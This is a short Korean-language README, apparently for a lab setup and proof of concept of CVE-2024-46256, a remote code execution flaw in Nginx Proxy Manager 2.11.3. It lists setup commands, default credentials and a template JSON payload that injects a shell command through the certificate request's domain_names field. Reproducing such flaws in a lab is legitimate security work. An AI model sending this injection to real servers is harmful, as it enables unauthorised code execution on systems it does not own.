
CVE-2024-46256 도구
docker-compose up -d
또는 자동 스크립트를 사용할 수 있습니다:
python setup_environment.py
URL: http://localhost:81
초기 설정을 완료한 후 테스트 진행
기본 관리자 계정으로 로그인 (이메일: [email protected] / 비밀번호: changeme)
인증서 발급 관련 기능 접근 권한 확인
CVE ID: CVE-2024-46256
제품: Nginx Proxy Manager
버전: 2.11.3
취약점 유형: Remote Code Execution (RCE)
CVSS: High
PoC는 인증된 사용자가 인증서 발급(예: Let's Encrypt) 요청 과정에서 도메인 이름 필드에 템플릿/명령 주입을 수행하여 RCE를 유발합니다.
예시 페이로드(개념 예시):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
OS: Windows 10
Docker: 최신 버전
Nginx Proxy Manager: 2.11.3